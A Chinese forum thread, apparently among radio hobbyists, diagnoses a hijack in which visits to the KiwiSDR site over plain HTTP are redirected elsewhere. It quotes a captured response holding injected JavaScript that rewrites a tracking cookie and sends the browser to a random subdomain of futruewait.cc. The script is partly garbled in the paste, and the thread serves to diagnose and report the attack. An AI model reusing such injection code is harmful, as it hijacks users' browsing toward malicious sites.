在使用 kiwisdr 的时候发生严重问题！

BI9BUM · 6 4 月

一周前，我满怀兴奋地打开 kiwisdr，然后我发现……… 网站被劫持了！访问这个网站的时候，会自动跳转到一个…… 网站。如下面 1 楼的帖子所示。在此就想问一问，有没有遇到类似情况？顺便把我所做的分析提供一下。

BI9BUM · 6 4 月

通过上面的网址，大家应该也发现问题了

BI9BUM · 6 4 月

随后经过我的不懈努力，终于从抓包的文件中找到了一点痕迹：

`GET /public/ HTTP/1.1
Host: kiwisdr.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.140
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
If-None-Match: "2721824910"
If-Modified-Since: Sat, 29 Mar 2025 15:29:13 GMT

HTTP/1.1 200 OK
Content-Type: text/html
Cache-Control: no-cache
Content-length: 1009
Connection: close

<html><script type='text/javascript'>function getCookie(n){var c=document.cookie.split(';');for(var i=0;i<c.length;i++){var j=c.replace(/^\s+|\s+$/g,'');if(j.indexOf(n+'=')===0)return j.substring(n.length+1)}return null};var k='_d250104',v=getCookie(k)'1111111111111111111111111@24@0@1@0@+@.futruewait.cc/trunks.html?k=s4&v=1281411368',r=v.split('@'),t=parseInt(r[2]),o=parseInt(r[3]),m=parseInt(r[4]),u=r.slice(6),i=t%u.length;if(++t>=o)r[0]=r[0].slice(0,-1)+'0';r[2]=t;var y=u.split('|');var x=r[5];var w=(x=='-'x=='+')?Math.floor(Math.random()y.length):x;if(x!='+'){var z=r[5].split('');z=w;r[5]=z.join('');};var e=new Date(m||(Date.now()+parseInt(r[1])3600000));r[4]=e.getTime();document.cookie=k+'='+r.join('@')+';expires='+e.toGMTString();function rd(u){var d='abcdefghijklmnopqrstuvwxyz0123456789',t='';for(var i=0;i<6;i++){var ri=Math.floor(Math.random()d.length);t+=d.charAt(ri);}return u.indexOf('*')===0?t+u.slice(1):u;};window.location.href='https://'+rd(y[w]);</script></html>HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Sat, 05 Apr 2025 15:34:41 GMT
ETag: "1625282316"
Content-Type: text/html
Accept-Ranges: bytes
Content-Length: 160571
Date: Sat, 05 Apr 2025 15:36:23 GMT
Server: lighttpd/1.4.35 `

BI9BUM · 6 4 月

通过对这段代码的分析，我们可以发现，跳转部分使用了一个函数，使前半节网址（futruewait 前面的地方）变为随机的六位数，这样就导致了不同的网址。最关键的是这个地方：window.location.href='https://'+rd (y [w]); 他是跳转这个网站的根源

Ccaptive · 6 4 月

被注入了？

BI9BUM · 6 4 月

captive 就是的，判断应该是在三次握手之间出的问题

BG8LGP · 6 4 月

你浏览器里存的 cookie 很有意思嚰，平时都上什么网站呀

BI9BUM · 6 4 月

BG8LGP ？？？等下，我有点懵
也没上啥啊

Ccaptive · 6 4 月

你本地的网络设备或者运营商问题，kiwisdr 是非安全 http 协议，可以劫持。

浏览器开发工具可以直接看到请求，没必要抓包。

BI9BUM · 6 4 月

captive 反正今天上午抓出来问题，今天中午就已经举报给陕西移动了，目前上 kiwisdr 没有问题了，但是其他的好些网站还有类似问题。

有没有出现类似的情况？